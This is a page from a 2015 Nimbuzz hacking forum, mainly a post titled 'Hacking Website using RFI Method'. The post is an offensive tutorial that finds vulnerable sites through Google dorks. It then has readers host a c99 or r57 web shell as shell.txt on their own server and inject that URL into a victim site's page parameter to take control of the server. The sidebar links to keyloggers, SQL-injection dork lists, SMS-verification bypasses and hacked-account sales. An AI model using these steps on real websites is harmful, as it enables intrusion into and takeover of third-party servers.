NΙΜΒUZZ |FLOOD |SERVER BOTS|FREE VPS |BOMBZZ|TIPS|TRICS|FB AUTOLIKER |WEBHOSTING|HTML5|JAVA SCRIPT|JAVA PROGRAMING|PC|ANDROID|SYMBIAN|JAVA|VB.NET|C#.NET|PYHTON|FORUM BY VAXINO@NIMBUZZ.COM
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in
Join Our chatroom: 3kerala@conference.com
Stylish 2,3digit ids ,vps& Nimbuckz for sale More Info Add: sdu@nimbuzz..com/ vaxino@nimbuz.com
NEW ids:витек64@n.c,ɡ@n.c,y1@n.c,(g@n.c,d)@n.c,2n@n.c,vk1@n.c,=at@n.c,=xg@n.c,cdo@n.c,→ъдяд@n.c,a。l。i。e。n。@n.c,◦ξอδ,อf,ฟสгะ@n.c,☆•sндвтдв•☆@n.c,-֝֝-֝֝֝֝֝֝֝►τязz◄-֝֝֝֝֝֝֝-֝֝@n.c,мбλн◦σuяiρ@n.c,яэšť¡°н█дят@n.c,римма@n.c,николя@n.c,←ώθям→@n.c,°víŗģó~jíè°@n.c,々“david“々@n.c,almond@n.c,printed@n.c,backlite@n.c,marbles@n.c More Ids Visit :www.thenimbuzzerz.mobie.in
TIME
CREATE UR NIMBUZZ ID
nimbuzz id maker

Username

Password



Captcha

SERVER BOTS
Add 24x7 Online Server Bots:
The+xbot@n.cThe+kpv@n.c The+nuke@n.c The+buzz@n.c
The+kbz@n.c The+dx@n.c The+gfg@n.c
VISITORS COUNTER

Top posters
vaxino
 
karthik~ajay
 
sami-alarifi
 
Most active topics
ADD 24*7 ONLINE SERVER;) by [****~ajay~****@n.c]
Latest topics
» spy bot ids hacked
Mon Sep 21, 2015 5:22 pm by vaxino

» Fresh Dork List For SQL Injection
Sat Sep 19, 2015 11:52 am by vaxino

» Nim CHATROOM FREEZING (2015) nO PC NEED
Sat Sep 19, 2015 11:33 am by vaxino

» How To Bypass Phone and SMS verification of Any Website
Fri Sep 18, 2015 11:25 am by vaxino

» Burn Keylogger
Fri Sep 18, 2015 11:00 am by vaxino

» Multi Addlist Hanger
Fri Sep 18, 2015 10:42 am by vaxino

» ADD 24*7 ONLINE SERVER;) by [****~ajay~****@n.c]
Thu Sep 17, 2015 5:03 pm by sami-alarifi

» For Mobile IMEI Recovery (Invalid IMEI Issue For Android)
Thu Sep 17, 2015 11:21 am by vaxino

» Enter Chatroom with Out Captcha
Wed Sep 16, 2015 10:51 pm by vaxino

Top posting users this week
DISPLAY PICTURE STEALER

Nimbuzz Display Picture Stealer
FORUM LIVE TRAFFIC
Log in
Username:
Password:
Log in automatically: 
:: I forgot my password
Social bookmarking
Social bookmarking Digg  Social bookmarking Delicious  Social bookmarking Reddit  Social bookmarking Stumbleupon  Social bookmarking Slashdot  Social bookmarking Yahoo  Social bookmarking Google  Social bookmarking Blinklist  Social bookmarking Blogmarks  Social bookmarking Technorati  

Bookmark and share the address of NIMBUZZ FORUM 2015 on your social bookmarking website

Share | 
 

 Hacking Website using RFI Method

View previous topic View next topic Go down 
AuthorMessage
vaxino
σωηεя
σωηεя
avatar

Posts : 14
Join date : 2015-09-15

PostSubject: Hacking Website using RFI Method   Wed Sep 16, 2015 7:51 pm

What Is RFI(Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:


* Code execution on the web server
* Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
* Denial of Service (DoS)
* Data Theft/ManipulationRFI is a very uncommon vulnerability due to excessive patches and updates on websites.

S0 here we go _follow me____!!!!!

Finding a Vulnerable Site using Google Dorks and Checking for vulnerability
Here i provided a link for finding vulnerable sites using Google Dorks For RFI



Now for testing whether our site is vulnerable to RFI or not we will uss the following command

*http://www.targetsite.com/index.php?page=www.google.com*

Suppose our target site is*http://www.aabbcc.com *. So for checking our url will become something like diz

*http://www.aabbcc.com/v2/index.php?page=http://www.google.com*

If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then the site is not vulnerable to RFI.

Exploiting The Vulnerability
For that you will need to upload your shell

You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.

You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.

[You must be registered and logged in to see this link.]


Now comes adding our shell to victims website

Okay, once we are at the vulnerable page (*[You must be registered and logged in to see this link.]
we will have to replace*"http://www.google.com* *"* and include our own file(in my place its
(*http://www.oursite.com/shell.txt*)

Our new link should look like this.

*http://www.aabbcc.com/v2/index.php?page=**[You must be registered and logged in to see this link.]

*NOTE--> *The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".

* *Ok so we uploaded our shell successfully in the target site and i think you all know that what all you can do after uploading shell to the site Smile
Back to top Go down
View user profile http://nimbuzzerz.nstars.org
 
Hacking Website using RFI Method
View previous topic View next topic Back to top 
Page 1 of 1
 Similar topics
-
» Keysi Fighting Method and Krav Maga
» The MIR Method of Healing
» How do you go to any website you want at school?
» open every link in a new tab?
» Lus Sib Nug Rau Cov Tswjfwm Lub Website

Permissions in this forum:You cannot reply to topics in this forum
NIMBUZZ FORUM 2015 :: Website and Forum Hacking-
Jump to: